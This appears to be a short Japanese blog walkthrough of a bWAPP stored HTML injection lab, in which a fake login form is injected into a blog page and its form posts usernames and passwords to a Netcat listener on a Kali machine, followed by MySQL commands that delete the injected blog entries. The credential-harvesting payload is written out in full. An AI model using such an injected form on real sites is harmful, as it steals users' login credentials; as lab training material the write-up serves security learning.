Hello there, ('ω')ノ
以前にHTML Injection - Stored (Blog)はやったのですが。
悪意のあるログインフォームを配置することに。
さきに別途、仮想マシンのKali LinuxのIPアドレスを確認しておいて。
Netcatでリスナーを起動しておいて。
下記のコードをsubmitして。
<div class="test_code">test</div>
<div style="position: absolute; left: 120px; top: 100px; width: 300px; height: 50px; z-index: 1000; background-color:white;">
Please Login:
<form name="login" action="http://192.168.0.49:1234/hacked.html" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="username"/></td>
<td>Password:</td>
<td><input type="password" name="passwd"/></td>
<td><input type="submit" value="Login"/></td>
</tr>
</table>
</form></div>
すると、ログインフォームが表示されて。
ユーザ名とパスワードを入力してログインボタンを押すと。
Kali Linuxへ送信されて。
このままだと悪意のコードが保存されたままなので。
Bee-BoxでDBを編集することに。
その前にキーボードを日本語仕様に変更して。
setxkbmap jp
まずは、MYSQLのコマンドツールを起動して。
mysql -u root -p
パスワード:bug
データベースの確認と選択をして、テーブルの確認を。
show databases;
use bWAPP;
show tables;
blogの内容を確認するとさきほどのコードが表示されて。
select * from blog;
blogの内容を削除して。
delete from blog;
Best regards, (^^ゞ